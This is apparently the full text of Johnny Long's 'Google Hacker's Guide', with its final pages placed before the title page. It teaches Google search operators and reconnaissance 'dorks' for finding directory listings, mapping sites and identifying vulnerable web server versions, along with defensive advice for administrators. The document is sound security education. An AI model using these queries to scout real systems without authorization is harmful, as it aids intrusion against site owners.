Google Appliances
The Google search appliance is described at http://www.google.com/appliance/:
“Now the same reliable results you expect from Google web search can be yours
on your corporate website with the Google Search Appliance. This combined
hardware and software solution is easy to use, simple to deploy, and can be up
and running on your intranet and public website in just a few short hours.”
The Google appliance can best be described as a locally controlled and operated mini-
Google search engines for individuals and corporations. When querying a Google
appliance, often times the queries listed above in the “URL Syntax” section will not work.
Extra parameters are often required to perform a manual appliance query. Consider
running a search for "Steve Hansen" at the Google appliance found at Stanford. After
entering this search into the Stanford search page, the user is whisked away to a page
with this URL (chopped for readability):
http://find.stanford.edu/search?q=steve+hansen
&site=stanford&client=stanford&proxystylesheet=stanford
&output=xml_no_dtd&as_dt=i&as_sitesearch=
Breaking this up into chunks reveals three distinct pieces. First, the target appliance is
find.stanford.edu. Next, the query is "steve hansen" or "steve+hansen" and
last but not least are all the extra parameters:
&site=stanford&client=stanford&proxystylesheet=stanford
&output=xml_no_dtd&as_dt=i&as_sitesearch=
These parameters may differ from appliance to appliance, but it has become clear that
there are several default parameters that are required from a default installation of the
Google appliance like the one found at find.stanford.edu.
Googledorks
The term “googledork” was coined by Johnny Long (http://johnny.ihackstuff.com) and
originally meant “An inept or foolish person as revealed by Google.” After a great deal of
media attention, the term came to describe those “who troll the Internet for confidential
goods.” Either term is fine, really. What matters is that the term googledork conveys the
concept that sensitive stuff is on the web, and Google can help you find it. The official
googledorks page (found at http://johnny.ihackstuff.com/googledorks) lists many different
examples of unbelievable things that have been dug up through Google by the
maintainer of the page, Johnny Long. Each listing shows the Google search required to
find the information along with a description of why the data found on each page is so
interesting.
The Google Hacker’s Guide
johnny@ihackstuff.com
http://johnny.ihackstuff.com
- Page 28 -
Gooscan
Gooscan (http://johnny.ihackstuff.com) is a UNIX (Linux/BSD/Mac OS X) tool that
automates queries against Google search appliances, but with a twist. These particular
queries are designed to find potential vulnerabilities on web pages. Think "cgi scanner"
that never communicates directly with the target web server, since all queries are sent to
Google, not to the target. For the security professional, gooscan serves as a front-end
for an external server assessment and aids in the "information gathering" phase of a
vulnerability assessment. For the web server administrator, gooscan helps discover what
the web community may already know about a site thanks to Google.
Gooscan was not written using the Google API. This raises questions about the “legality”
of using gooscan as a Google scanner. Is gooscan “legal” to use? You should not use
this tool to query Google without advance express permission. Google appliances,
however, do not have these limitations. You should, however, obtain advance express
permission from the owner or maintainer of the Google appliance before searching it
with any automated tool for various legal and moral reasons. Only use this tool to
query appliances unless you are prepared to face the (as yet unquantified) wrath
of Google.
Although there are many features, the gooscan tool’s primary purpose is to scan Google
(as long as you obtain advance express permission from Google) or Google appliances
(as long as you have advance express permission from the owner/maintainer) for the
items listed on the googledorks page. In addition, the tool allows for a very thorough CGI
scan of a site through Google (as long as you obtain advance express permission from
Google) or a Google appliance (as long as you have advance express permission from
the owner/maintainer of the appliance). Have I made myself clear about how this tool is
intended to be used? Get permission! =) Once you have received the proper advance
express permission, gooscan makes it easy to measure the Google exposure of yourself
or your clients.
GooPot
The concept of a honeypot is very straightforward. According to techtarget.com:
“A honey pot is a computer system on the Internet that is expressly set up to
attract and ‘trap’ people who attempt to penetrate other people's computer
systems.”
In order to learn about how new attacks might be conducted, the maintainers of a
honeypot system monitor, dissect and catalog each attack, focusing on those attacks
which seem unique.
An extension of the classic honeypot system, a web-based honeypot or “pagepot” is
designed to attract those employing the techniques outlined in this paper. The concept is
fairly straightforward. A simple googledork entry like “inurl:admin
inurl:userlist” could easily be replicated with a web-based honeypot by creating
an index.html page which referenced another index.html file in an /admin/userlist
directory. If a web search engine like Google was instructed to crawl the top-level
index.html page, if would eventually find the link pointing to /admin/userlist/index.html.
The Google Hacker’s Guide
johnny@ihackstuff.com
http://johnny.ihackstuff.com
- Page 29 -
This link would satisfy the Google query of “inurl:admin inurl:userlist”
eventually attracting a curious Google searcher.
Once the Google searcher clicks on the Google, he is whisked away to the target web
page. In the background, the user’s web browser also sends many variables to that web
server, including one variable of interest, the “referrer” variable. This field contains the
complete name of the web page that was visited previously, or more clearly, the web site
that referred the user to the web page. The bottom line is that this variable can be
inspected to figure out how a web surfer found a web page assuming they clicked on
that link from a search engine page. This bit of information is critical to the maintainer of
a pagepot system, since it outlines the exact method the Google searcher used to locate
the pagepot system. The information aids in protecting other web sites from similar
queries.
The concept of a pagepot is not a new one thanks to many folks including the group at
http://www.gray-world.net/. Their web-based honeypot, hosted at http://www.grayworld.
net/etc/passwd/ is designed to entice those using Google like a CGI scanner. This
is not a bad concept, but as we’ve seen in this paper, there are so many other ways to
use Google to find vulnerable or sensitive pages.
The Google Hacker’s Guide
johnny@ihackstuff.com
http://johnny.ihackstuff.com
- Page 30 -
Enter GooPot, the Google honeypot system designed by johnny@ihackstuff.com. By
populating a web server with sensitive-looking documents and monitoring the referrer
variables passed to the server, a GooPot administrator can learn about new web search
techniques being employed in the wild and subsequently protect his site from similar
queries. Beyond a simple pagepot, GooPot uses enticements based on the many
techniques outlined in the googledorks collection and this document. In addition, the
GooPot more closely resembles the juicy targets that Google hackers typically go after.
Johnny Long, the administrator of the googledorks list, utilizes the GooPot to discover
new search types and publicize them in the form of googledorks listings, creating a selfsustaining
cycle for learning about, and protecting from search engine attacks.
Although the GooPot system is currently not publicly available, expect it to be made
available early 2Q 2004.
A word about how Google finds pages (Opera)
Although the concept of web crawling is fairly straightforward, Google has created other
methods for learning about new web pages. Most notably, Google has incorporated a
feature into the latest release of the Opera web browser. When an Opera user types a
URL into the address bar, the URL is sent to Google, and is subsequently crawled by
Google’s bots. According to the FAQ posted at http://www.opera.com/adsupport:
“The Google system serves advertisements and related searches to the Opera
browser through the Opera browser banner 468x60 format. Google determines
what ads and related searches are relevant based on the URL and content of the
page you are viewing and your IP address, which are sent to Google via the
Opera browser.”
As of the time of this writing it is unclear as to whether or not Google includes the link
into it’s search engine. However, testing shows that when an unindexed URL
(http://johnny.ihackstuff.com/temp/suck.html) was entered into Opera 7.2.3, a Googlebot
crawled the URL moments later as shown by the following access.log excerpts:
64.68.87.41 - "GET /robots.txt HTTP/1.0" 200 220 "-" "Mediapartners-
Google/2.1 (+http://www.googlebot.com/bot.html)"
64.68.87.41 - "GET /temp/suck.html HTTP/1.0" 200 5 "-" "Mediapartners-
Google/2.1 (+http://www.googlebot.com/bot.html)"
The privacy implications of this could be staggering, especially if you Opera users expect
visited URLs to remain private.
This feature can be turned off within Opera by selecting “Show generic selection of
graphical ads” from the “File -> Preferences -> Advertising” screen.
Protecting yourself from Google hackers
1. Keep your sensitive data off the web!
Even if you think you’re only putting your data on a web site temporarily, there’s a
good chance that you’ll either forget about it, or that a web crawler might find it.
Consider more secure ways of sharing sensitive data such as SSH/SCP or
encrypted email.
The Google Hacker’s Guide
johnny@ihackstuff.com
http://johnny.ihackstuff.com
- Page 31 -
2. Googledork!
• Use the techniques outlined in this paper to check your own site for
sensitive information or vulnerable files.
• Use gooscan from http://johnny.ihackstuff.com) to scan your site for bad
stuff, but first get advance express permission from Google! Without
advance express permission, Google could come after you for violating
their terms of service. The author is currently not aware of the exact
implications of such a violation. But why anger the “Goo-Gods”?!?
• Check the official googledorks website (http://johnny.ihackstuff.com) on a
regular basis to keep up on the latest tricks and techniques.
3. Consider removing your site from Google’s index.
The Google webmaster FAQ located at http://www.google.com/webmasters/
provides invaluable information about ways to properly protect and/or expose
your site to Google. From that page:
“Please have the webmaster for the page in question contact us with proof that
he/she is indeed the webmaster. This proof must be in the form of a root level
page on the site in question, requesting removal from Google. Once we receive
the URL that corresponds with this root level page, we will remove the offending
page from our index.”
In some cases, you may want to rome individual pages or snippets from Google’s
index. This is also a straightforward process which can be accomplished by
following the steps outlined at http://www.google.com/remove.html.
4. Use a robots.txt file.
Web crawlers are supposed to follow the robots exclusion standard found at
http://www.robotstxt.org/wc/norobots.html. This standard outlines the procedure
for “politely requesting” that web crawlers ignore all or part of your website. I
must note that hackers may not have any such scruples, as this file is certainly a
suggestion. The major search engine’s crawlers honor this file and it’s contents.
For examples and suggestions for using a robots.txt file, see the above URL on
robotstxt.org.
Thanks and shouts
First, I would like to thank God for the taking the time to pierce my way-logical mind with
the unfathomable gifts of sight by faith and eternal life through the sacrifice of Jesus
Christ.
Thanks to my family for putting up with the analog version of j0hnny.
Shouts to the STRIKEFORCE, “Gotta_Getta_Hotdog” Murray, “Re-Ron” Shaffer, “2 cute
to B single” K4yDub, “Nice BOOOOOSH” Arnold, “Skull Thicker than a Train Track”
The Google Hacker’s Guide
johnny@ihackstuff.com
http://johnny.ihackstuff.com
- Page 32 -
Chapple, “Bitter Bagginz” Carter, Fosta’ (student=teacher;), Tiger “Lost my badge”
Woods, LARA “Shake n Bake” Croft, “BananaJack3t” Meyett, Patr1ckhacks, Czup, Mike
“Scan Master, Scan Faster” Walker, “Mr. I Love JAVA” Webster, “Soul Sistah” G Collins,
Chris, Carey, Matt, KLOWE, haywood, micah, Shouts to those who have passed on:
Chris, Ross, Sanguis, Chuck, Troy, Brad.
Shouts to Joe “BinPoPo”, Steve Williams (by far the most worthy defender I’ve had the
privilege of knowing) and to “Bigger is Better” Fr|tz.
Thanks to my website members for the (admittedly thin) stream of feedback and
Googledork additions. Maybe this document will spur more submissions.
Thanks to JeiAr at GulfTech Security, Cesar
of Appdetective fame, and Mike “Supervillain” Carter for the outstanding contributions to
the googledorks database.
Thanks to Chris O'Ferrell (www.netsec.net), Yuki over at the Washington Post, Slashdot,
and TheRegister.co.uk for all the media coverage. While I’m thanking my referrers, I
should mention Scott Granneman for the front-page SecurityFocus article that was all
about Googledorking. He was nice enough to link me and call Googledorks his “favorite
site” for Google hacking even though he didn’t mention me by name or return any of my
emails. I’m not bitter though… it sure generated a lot of traffic! After all the good press,
it’s wonderful to be able to send out a big =PpPPpP to NewScientist Magazine for their
particularly crappy coverage of this topic. Just imagine, all this traffic could have been
yours if you had handled the story properly.
Shouts out to Seth Fogie, Anton Rager, Dan Kaminsky, rfp, Mike Schiffman, Dominique
Brezinski, Tan, Todd, Christopher (and the whole packetstorm crew), Bruce Potter,
Dragorn, and Muts (mutsonline, whitehat.co.il) and my long lost friend Topher.
Hello’s out to my good friends SNShields and Nathan.
When in Vegas, be sure to visit any of the world-class properties of the MGM/Mirage or
visit them online at http://mgmmirage.com. =)
- Page 1 -
The Google Hacker’s Guide
Understanding and Defending Against
the Google Hacker
by Johnny Long
johnny@ihackstuff.com
http://johnny.ihackstuff.com
The Google Hacker’s Guide
johnny@ihackstuff.com
http://johnny.ihackstuff.com
- Page 2 -
GOOGLE SEARCH TECHNIQUES................................................................................................................ 3
GOOGLE WEB INTERFACE.................................................................................................................................. 3
BASIC SEARCH TECHNIQUES .............................................................................................................................. 7
GOOGLE ADVANCED OPERATORS ........................................................................................................... 9
ABOUT GOOGLE’S URL SYNTAX .................................................................................................................... 12
GOOGLE HACKING TECHNIQUES........................................................................................................... 13
DOMAIN SEARCHES USING THE ‘SITE’ OPERATOR........................................................................................... 13
FINDING ‘GOOGLETURDS’ USING THE ‘SITE’ OPERATOR................................................................................. 14
SITE MAPPING: MORE ABOUT THE ‘SITE’ OPERATOR...................................................................................... 15
FINDING DIRECTORY LISTINGS ........................................................................................................................ 16
VERSIONING: OBTAINING THE WEB SERVER SOFTWARE / VERSION ............................................................. 17
via directory listings .................................................................................................................................. 17
via default pages ........................................................................................................................................ 19
via manuals, help pages and sample programs......................................................................................... 21
USING GOOGLE AS A CGI SCANNER................................................................................................................ 23
USING GOOGLE TO FIND INTERESTING FILES AND DIRECTORIES .................................................................... 25
ABOUT GOOGLE AUTOMATED SCANNING.......................................................................................... 26
OTHER GOOGLE STUFF .............................................................................................................................. 27
GOOGLE APPLIANCES ..................................................................................................................................... 27
GOOGLEDORKS................................................................................................................................................ 27
GOOSCAN ........................................................................................................................................................ 28
GOOPOT .......................................................................................................................................................... 28
A WORD ABOUT HOW GOOGLE FINDS PAGES (OPERA)................................................................. 30
PROTECTING YOURSELF FROM GOOGLE HACKERS...................................................................... 30
THANKS AND SHOUTS................................................................................................................................. 31
The Google Hacker’s Guide
johnny@ihackstuff.com
http://johnny.ihackstuff.com
- Page 3 -
The Google search engine found at www.google.com offers many different features
including language and document translation, web, image, newsgroups, catalog and
news searches and more. These features offer obvious benefits to even the most
uninitiated web surfer, but these same features allow for far more nefarious possibilities
to the most malicious Internet users including hackers, computer criminals, identity
thieves and even terrorists. This paper outlines the more nefarious applications of the
Google search engine, techniques that have collectively been termed “Google hacking.”
The intent of this paper is to educate web administrators and the security community in
the hopes of eventually securing this form of information leakage.
Google search techniques
Google web interface
The Google search engine is fantastically easy to use. Despite the simplicity, it is very
important to have a firm grasp of these basic techniques in order to fully comprehend the
more advanced uses. The most basic Google search can involve a single word entered
into the search page found at www.google.com.
Figure 1: The main Google search page
As shown in Figure 1, I have entered the word “sardine” into the search screen. Figure 1
shows many of the options available from the www.google.com front page.
The Google toolbar The Internet Explorer browser I am using has a Google
“toolbar” (a free download from toolbar.google.com) installed
and presented under the address bar. Although the toolbar
offers many different features, it is not a required element for
performing advanced searches. Even the most advanced
search functionality is available to any user able to access the
www.google.com web page with any type of browser, including
text-based and mobile browsers.
The Google Hacker’s Guide
johnny@ihackstuff.com
http://johnny.ihackstuff.com
- Page 4 -
text-based and mobile browsers.
“Web, Images,
Groups, Directory and
News” tabs
These tabs allow you to search web pages, photographs,
message group postings, Google directory listings, and news
stories respectively. First-time Google users should consider
that these tabs are not always a replacement for the “Submit
Search” button.
Search term input field Located directly below the alternate search tabs, this text field
allows the user to enter a Google search term. Search term
rules will be described later.
“Submit Search” This button submits the search term supplied by the user. In
many browsers, simply pressing the “Enter/Return” key after
typing a search term will activate this button.
“I’m Feeling Lucky” Instead of presenting a list of search results, this button will
forward the user to the highest-ranked page for the entered
search term. Often times, this page is the most relevant page
for the entered search term.
“Advanced Search” This link takes the user to the “Advanced Search” page as
shown in Figure 2. Much of the advanced search functionality is
accessible from this page. Some advanced features are not
listed on this page.
“Preferences” This link allows the user to select several options (which are
stored in cookies on the user’s machine for later retrieval)
including languages, filters, number of results per page, and
window options.
“Language tools” This link allows the user to set many different language options
and translate text to and from various languages.
The Google Hacker’s Guide
johnny@ihackstuff.com
http://johnny.ihackstuff.com
- Page 5 -
Figure 2: Advanced Search page
Once a user submits a search by clicking the “Submit Search” button or by pressing
enter in the search term input box, a results page may be displayed as shown in Figure
3.
Figure 3: A basic Google search results page.
The search results page allows the user to explore the search results in various ways.
Top line The top line (found under the alternate search tabs) lists the
search query, the number of hits displayed and found, and
how long the search took.
The Google Hacker’s Guide
johnny@ihackstuff.com
http://johnny.ihackstuff.com
- Page 6 -
search query, the number of hits displayed and found, and
how long the search took.
“Category” link This link takes you to the Google directory category for the
search you entered. The Google directory is a highly
organized directory of the web pages that Google monitors.
Main page link This link takes you directly to a web page. Figure 3 shows
this as “Sardine Factory :: Home page”
Description The short description of a site
Cached link This link takes you to Google’s copy of this web page. This
is very handy if a web page changes or goes down.
“Similar Pages” This link takes to you similar pages based on the Google
category.
“Sponsored Links”
coluimn
This column lists pay targeted advertising links based on
your search query.
Under certain circumstances, a blank error page (See Figure 4) may be presented
instead of the search results page. This page is the catchall error page, which generally
means Google encountered a problem with the submitted search term. Many times this
means that a search query option was not entered properly.
Figure 4: The "blank" error page
In addition to the “blank” error page, another error page may be presented as shown in
Figure 5. This page is much more descriptive, informing the user that a search term was
missing. This message indicates that the user needs to add to the search query.
The Google Hacker’s Guide
johnny@ihackstuff.com
http://johnny.ihackstuff.com
- Page 7 -
Figure 5: Another Google error page
There is a great deal more to Google’s web-based search functionality which is not
covered in this paper.
Basic search techniques
Simple word searches
Basic Google searches, as I have already presented, consist of one or more
words entered without any quotations or the use of special keywords. Examples:
peanut butter
butter peanut
olive oil popeye
‘+’ searches
When supplying a list of search terms, Google automatically tries to find every
word in the list of terms, making the Boolean operator “AND” redundant. Some
search engines may use the plus sign as a way of signifying a Boolean “AND”.
Google uses the plus sign in a different fashion. When Google receives a basic
search request that contains a very common word like “the”, “how” or “where”,
the word will often times be removed from the query as shown in Figure 6.
Figure 6: Google removing overly common words
The Google Hacker’s Guide
johnny@ihackstuff.com
http://johnny.ihackstuff.com
- Page 8 -
In order to force Google to include a common word, precede the search term with
a plus (+) sign. Do not use a space between the plus sign and the search term.
For example, the following searches produce slightly different results:
where quick brown fox
+where quick brown fox
The ‘+’ operator can also be applied to Google advanced operators, discussed
below.
‘-‘ searches
Excluding a term from a search query is as simple as placing a minus sign (-)
before the term. Do not use a space between the minus sign and the search
term. For example, the following searches produce slightly different results:
quick brown fox
quick –brown fox
The ‘-’ operator can also be applied to Google advanced operators, discussed
below.
The Google Hacker’s Guide
johnny@ihackstuff.com
http://johnny.ihackstuff.com
- Page 9 -
Phrase Searches
In order to search for a phrase, supply the phrase surrounded by double-quotes.
Examples:
“the quick brown fox”
“liberty and justice for all”
“harry met sally”
Arguments to Google advanced operators can be phrases enclosed in quotes, as
described below.
Mixed searches
Mixed searches can involve both phrases and individual terms. Example:
macintosh "microsoft office"
This search will only return results that include the phrase “Microsoft office” and
the term macintosh.
Google advanced operators
Google allows the use of certain operators to help refine searches. The use of advanced
operators is very simple as long as attention is given to the syntax. The basic format is:
operator:search_term
Notice that there is no space between the operator, the colon and the search term. If a
space is used after a colon, Google will display an error message. If a space is used
before the colon, Google will use your intended operator as a search term.
Some advanced operators can be used as a standalone query. For example
‘cache:www.google.com’ can be submitted to Google as a valid search query. The
‘site’ operator, by contrast, must be used along with a search term, such as
‘site:www.google.com help’.
Table 1: Advanced Operator Summary
Operator Description Additional search
argument required?
site: find search term only on site specified by search_term. YES
filetype: search documents of type search_term YES
link: find sites containing search_term as a link NO
cache: display the cached version of page specified by
search_term
NO
intitle: find sites containing search_term in the title of a page NO
inurl: find sites containing search_term in the URL of the page NO
The Google Hacker’s Guide
johnny@ihackstuff.com
http://johnny.ihackstuff.com
- Page 10 -
site: find web pages on a specific web site
This advanced operator instructs Google to restrict a search to a specific web site or
domain. When using this operator, an addition search argument is required.
Example:
site:harvard.edu tuition
This query will return results from harvard.edu that include the term tuition anywhere on
the page.
filetype: search only within files of a specific type.
This operator instructs Google to search only within the text of a particular type of file.
This operator requires an additional search argument.
Example:
filetype:txt endometriosis
This query searches for the word ‘endometriosis’ within standard text documents. There
should be no period (.) before the filetype and no space around the colon following the
word “filetype”. It is important to note thatGoogle only claims to be able to search within
certain types of files. Based on my experience, Google can search within most files that
present as plain text. For example, Google can easily find a word within a file of type
“.txt,” “.html” or “.php” since the output of these files in a typical web browser window is
textual. By contrast, while a WordPerfect document may look like text when opened with
the WordPerfect application, that type of file is not recognizable to the standard web
browser without special plugins and by extension, Google can not interpret the
document properly, making a search within that document impossible. Thankfully,
Google can search within specific type of special files, making a search like
“filetype:doc endometriosis“ a valid one.
The current list of files that Google can search is listed in the filetype FAQ located at
http://www.google.com/help/faq_filetypes.html. As of this writing, Google can search
within the following file types:
• Adobe Portable Document Format (pdf)
• Adobe PostScript (ps)
• Lotus 1-2-3 (wk1, wk2, wk3, wk4, wk5, wki, wks, wku)
• Lotus WordPro (lwp)
• MacWrite (mw)
• Microsoft Excel (xls)
• Microsoft PowerPoint (ppt)
• Microsoft Word (doc)
• Microsoft Works (wks, wps, wdb)
• Microsoft Write (wri)
• Rich Text Format (rtf)
• Text (ans, txt)
The Google Hacker’s Guide
johnny@ihackstuff.com
http://johnny.ihackstuff.com
- Page 11 -
link: search within links
The hyperlink is one of the cornerstones of the Internet. A hyperlink is a selectable
connection from one web page to another. Most often, these links appear as underlined
text but they can appear as images, video or any other type of multimedia content. This
advanced operator instructs Google to search within hyperlinks for a search term. This
operator requires no other search arguments.
Example:
link:www.apple.com
This query query would display web pages that link to Apple.com’s main page. This
special operator is somewhat limited in that the link must appear exactly as entered in
the search query. The above query would not find pages that link to
www.apple.com/ipod, for example.
cache: display Google’s cached version of a page
This operator displays the version of a web page as it appeared when Google crawled
the site. This operator requires no other search arguments.
Example:
cache:johnny.ihackstuff.com
cache:http://johnny.ihackstuff.com
These queries would display the cached version of Johnny’s web page. Note that both of
these queries return the same result. I have discovered, however, that sometimes
queries formed like these may return different results, with one result being the dreaded
“cache page not found” error. This operator also accepts whole URL lines as arguments.
intitle: search within the title of a document
This operator instructs Google to search for a term within the title of a document. Most
web browsers display the title of a document on the top title bar of the browser window.
This operator requires no other search arguments.
Example:
intitle:gandalf
This query would only display pages that contained the word ‘gandalf’ in the title. A
derivative of this operator, ‘allintitle’ works in a similar fashion.
Example:
allintitle:gandalf silmarillion
The Google Hacker’s Guide
johnny@ihackstuff.com
http://johnny.ihackstuff.com
- Page 12 -
This query finds both the words ‘gandalf’ and ‘silmarillion’ in the title of a page. The
‘allintitle’ operator instructs Google to find every subsequent word in the query only in the
title of the page. This is equivalent to a string of individual ‘intitle’ searches.
inurl: search within the URL of a page
This operator instructs Google to search only within the URL, or web address of a
document. This operator requires no other search arguments.
Example:
inurl:amidala
This query would display pages with the word ‘amidala’ inside the web address. One
returned result, ‘http://www.yarwood.org/kell/amidala/’ contains the word
‘amidala’ as the name of a directory. The word can appear anywhere within the web
address, including the name of the site or the name of a file. A derivative of this operator,
‘allinurl’ works in a similar fashion.
Example:
allinurl:amidala gallery
This query finds both the words ‘amidala’ and ‘gallery’ in the URL of a page. The ‘allinurl’
operator instructs Google to find every subsequent word in the query only in the URL of
the page. This is equivalent to a string of individual ‘inurl’ searches.
For a complete list of advanced operators and their usage, see
http://www.google.com/help/operators.html.
About Google’s URL syntax
The advanced Google user often times streamlines the search process by use of the
Google toolbar (not discussed here) or through direct use of Google URL’s. For
example, consider the URL generated by the web search for sardine:
http://www.google.com/search?hl=en&ie=UTF-8&oe=UTF-8&q=sardine
First, notice that the base URL for a Google search is
“http://www.google.com/search”. The question mark denotes the end of the URL
and the beginning of the arguments to the “search” program. The “&” symbol separates
arguments. The URL presented to the user may vary depending on many factors
including whether or not the search was submitted via the toolbar, the native language of
the user, etc. Arguments to the Google search program are well documented at
http://www.google.com/apis. The arguments found in the above URL are as follows:
hl: Native language results, in this case “en” or English.
ie: Input encoding, the format of incoming data. In this case “UTF-8”.
oe: Output encoding, the format of outgoing data. In this case “UTF-8”.
q: Query. The search query submitted by the user. In this case “sardine”.
The Google Hacker’s Guide
johnny@ihackstuff.com
http://johnny.ihackstuff.com
- Page 13 -
Most of the arguments in this URL can be omitted, making the URL much more concise.
For example, the above URL can be shortened to
http://www.google.com/search?q=sardine
making the URL much more concise. Additional search terms can be appended to the
URL with the plus sign. For example, to search for “sardine” along with “peanut” and
“butter,” consider using this URL:
http://www.google.com/search?q=sardine+peanut+butter
Since simplified Google URLs are simple to read and portable, they are often used as a
way to represent a Google search.
Google (and many other web-based programs) must represent special characters like
quotation marks in a URL with a hexadecimal number preceded by a percent (%) sign in
order to follow the http URL standard. For example, a search for “the quick brown fox”
(paying special attention to the quotation marks) is represented as
http://www.google.com/search?&q=%22the+quick+brown+fox%22
In this example, a double quote is displayed as “%22” and spaces are replaced by plus
(+) signs. Google does not exclude overly common words from phrase searches. Overly
common words are automatically included when enclosed in double-quotes.
Google hacking techniques
Domain searches using the ‘site’ operator
The site operator can be expanded to search out entire domains. For example:
site:gov secret
This query searches every web site in the .gov domain for the word ‘secret’. Notice that
the site operator works on addresses in reverse. For example, Google expects the site
operator to be used like this:
site:www.cia.gov
site:cia.gov
site:gov
Google would not necessarily expect the site operator to be used like this:
site:www.cia
site:www
site:cia
The reason for this is simple. ‘Cia’ and ‘www’ are not valid top-level domain names. This
means that as of this writing, Internet names may not end in ‘cia’ or ‘www’. However,
The Google Hacker’s Guide
johnny@ihackstuff.com
http://johnny.ihackstuff.com
- Page 14 -
sending unexpected queries like these are part of a competent Google hacker’s arsenal
as we explore in the “googleturds” section.
How this technique can be used
1. Journalists, snoops and busybodies in general can use this technique to find
interesting ‘dirt’ about a group of websites owned by organizations such as a
government or non-profit organization. Remember that top-level domain names
are often very descriptive and can include interesting groups such as: the U.S.
Government (.gov or .us)
2. Hackers searching for targets. If a hacker harbors a grudge against a specific
country or organization, he can use this type of search to find sensitive targets.
Finding ‘googleturds’ using the ‘site’ operator
Googleturds, as I have named them, are little dirty pieces of Google ‘waste’. These
search results seem to have stemmed from typos Google found while crawling a web
page. Example:
site:csc
site:microsoft
Neither of these queries are valid according to the loose rules of the ‘site’ operator, since
they do not end in valid top-level domain names. However, these queries produce
interesting results as shown in Figure 7.
Figure 7: Googleturd example
These little bits of information are most likely the results of typographical errors in links
place on web pages.
The Google Hacker’s Guide
johnny@ihackstuff.com
http://johnny.ihackstuff.com
- Page 15 -
How this technique can be used
Hackers investigating a target can use munged site values based on the target’s name
to dig up Google pages (and subsequently potential sensitive data) that may not be
available to Google searches using the valid ‘site’ operator. Example: A hacker is
interested in sensitive information about ABCD Corporation, located on the web at
www.ABCD.com. Using a query like ‘site:ABCD’ may find mistyped links
(http://www.abcd instead of http://www.abcd.com) containing interesting information.
Site mapping: More about the ‘site’ operator
Mapping the contents of a web server via Google is simple. Consider the following
query:
site:www.microsoft.com microsoft
This query searches for the word ‘microsoft’, restricting the search to the
www.microsoft.com web site. How many pages on the Microsoft web server contain the
word ‘microsoft?’ According to Google, all of them! Remember that Google searches not
only the content of a page, but the title and URL as well. The word ‘microsoft’ appears in
the URL of every page on www.microsoft.com. With one single query, an attacker gains
a rundown of every web page on a site cached by Google.
There are some exceptions to this rule. If a link on the Microsoft web page points back to
the IP address of the Microsoft web server, Google will cache that page as belonging to
the IP address, not the www.micorosft.com web server. In this special case, an attacker
would simply alter the query, replacing the word ‘microsoft’ with the IP address(es) of the
Microsoft web server.
Google has recently added an additional method of accomplishing this task. This
technique allows Google users to simply enter a ‘site’ query alone. Example:
site:microsoft.com
This technique is simpler, but I’m not sure if this search technique is a permanent
Google feature.
Since Google only follows links that it finds on the Web, don’t expect this technique to
return every single web page hosted on a web server.
How this technique can be used
This technique makes it very simple for any interested party to get a complete rundown
of a website’s structure without ever visiting the website directly. Since Google searches
occur on Google’s servers, it stands to reason that only Google has a record of that
search. The process of viewing cached pages from Google can also be safe as long as
the Google hacker takes special care not to allow his browser to load linked content
such as images from that cached page. For a competent attacker, this is a trivial
exercise. Simply put, Google allows for a great deal of target reconnaissance that results
in little or no exposure for the attacker.
The Google Hacker’s Guide
johnny@ihackstuff.com
http://johnny.ihackstuff.com
- Page 16 -
Finding Directory listings
Directory listings provide a list of files and directories in a browser window instead of the
typical text-and graphics mix generally associated with web pages. Figure 8 shows a
typical directory listing.
Figure 8: A typical directory listing
Directory listings are often placed on web servers purposely to allow visitors to browse
and download files from a directory tree. Many times, however, directory listings are not
intentional. A misconfigured web server may produce a directory listing if an index, or
main web page file is missing. In some cases, directory listings are setup as a
temporarily storage location for files. Either way, there’s a good chance that an attacker
may find something interesting inside a directory listing.
Locating directory listings with Google is fairly straightforward. Figure 8 shows that most
directory listings begin with the phrase “Index of”, which also shows in the title. An
obvious query to find this type of page might be “intitle:index.of”, which may find
pages with the term ‘index of’ in the title of the document. Remember that the period (.)
serves as a single-character wildcard in Google. Unfortunately, this query will return a
large number of false-positives such as pages with the following titles:
Index of Native American Resources on the Internet
LibDex - Worldwide index of library catalogues
Iowa State Entomology Index of Internet Resources
Judging from the titles of these documents, it is obvious that not only are these web
pages intentional, they are also not the directory listings we are looking for. (*jedi wave*
“This is not the directory listing you’re looking for.”) Several alternate queries provide
more accurate results:
intitle:index.of "parent directory"
intitle:index.of name size
The Google Hacker’s Guide
johnny@ihackstuff.com
http://johnny.ihackstuff.com
- Page 17 -
These queries indeed provide directory listings by not only focusing on “index.of” in the
title, but on key words often found inside directory listings such as “parent directory”
“name” and “size.”
How this technique can be used
Bear in mind that many directory listings are intentional. However, directory listings
provide the Google hacker a very handy way to quickly navigate through a site. For the
purposes of finding sensitive or interesting information, browsing through lists of file and
directory names can be much more productive than surfing through the guided content
of web pages. Directory listings provide a means of exploiting other techniques such as
versioning and file searching, explained below.
Versioning: Obtaining the Web Server Software / Version
via directory listings
The exact version of the web server software running on a server is one piece of
required information an attacker requires before launching a successful attack against
that web server. If an attacker connects directly to that web server, the HTTP (web)
headers from that server can provide this information. It is possible, however, to retrieve
similar information from Google without ever connecting to the target server under
investigation. One method involves the using the information provided in a directory
listing.
Figure 9: Directory listing "server.at" example
Figure 9 shows the bottom line of a typical directory listing. Notice that the directory
listing includes the name of the server software as well as the version. An adept web
administrator can fake this information, but this information is often legitimate, allowing
an attacker to determine what attacks may work against the server. This example was
gathered using the following query:
The Google Hacker’s Guide
johnny@ihackstuff.com
http://johnny.ihackstuff.com
- Page 18 -
intitle:index.of server.at
This query focuses on the term “index of” in the title and “server at” appearing at the
bottom of the directory listing. This type of query can additionally be pointed at a
particular web server:
intitle:index.of server.at site:aol.com
The result of this query indicates that gprojects.web.aol.com and vidup-r1.blue.aol.com,
both run Apache web servers.
intitle:index.of server.at site:apple.com
The result of this query indicates that mirror.apple.com runs an Apache web server. This
technique can also be used to find servers running a particular version of a web server.
For example:
intitle:index.of "Apache/1.3.0 Server at"
This query will find servers with directory listings enabled that are running Apache
version 1.3.0.
How this technique can be used
This technique is somewhat limited by the fact that the target must have at least one
page that produces a directory listing, and that listing must have the server version
stamped at the bottom of the page. There are more advanced techniques that can be
employed if the server ‘stamp’ at the bottom of the page is missing. This technique
involves a ‘profiling’ technique which involves focusing on the headers, title, and overall
format of the directory listing to observe clues as to what web server software is running.
By comparing known directory listing formats to the target’s directory listing format, a
competent Google hacker can generally nail the server version fairly quickly. This
technique is also flawed in that most servers allow directory listings to be completely
customized, making a match difficult. Some directory listings are not under the control of
the web server at all but instead rely on third-party software. In this particular case, it
may be possible to identify the third party software running by focusing on the source
(‘view source’ in most browsers) of the directory listing’s web page or by using the
profiling technique listed above.
